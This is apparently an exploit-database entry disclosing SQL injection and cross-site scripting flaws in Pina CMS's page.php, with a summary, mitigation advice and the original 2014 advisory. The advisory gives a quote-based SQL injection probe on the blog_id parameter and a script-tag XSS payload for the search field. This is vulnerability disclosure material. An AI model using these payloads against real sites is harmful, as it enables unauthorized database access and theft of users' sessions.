header-logo
Suggest Exploit
vendor:
Pina CMS
by:
Shadman Tanjim
8,8
CVSS
HIGH
SQL Injection and XSS
89, 79
CWE
Product Name: Pina CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows/Linux
2014

Pina CMS SQL Injection and XSS Vulnerabilities

The vulnerability exists due to insufficient filtration of user-supplied input in 'blog_id' and 'search' parameters in 'page.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Also, an attacker can inject arbitrary web script or HTML in application's 'search' parameter. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials, modify data, deface web site, perform phishing attacks and launch other attacks.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Also, the application should properly sanitize user-supplied input before using it in the generated web page.
Source

Exploit-DB raw data:

############################################################################
# Title: Pina CMS SQL Injection and XSS Vulnerabilities 
# Vendor: www.pinacms.com
# Vendor Notified: 15-02-2014
# Vendor Replied: 16-02-2014
# Release in Public: 18-02-2014
# Tested on: Windows/Linux
# Author/Found by: Shadman Tanjim 
# Website: www.secupent.com and www.vulnerability.io
# Email: service@secupent.com or shadman2600@gmail.com
# Twitter: twitter.com/secupent
# Facebook: fb.me/secupent
############################################################################

1. Vulnerability no 1 (SQL Injection):

http://target.com/page.php?action=post.manage.home&blog_id=1%27%22  

Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png

2. Vulnerability no 2. (XSS):

Go to this link: http://target.com/page.php?action=post.manage.home 

Apply this JavaScript on search bar

 "/><script>alert(574127);</script>
 
Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png




Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters.....

Navigation

Suggest Exploit

Services By CQR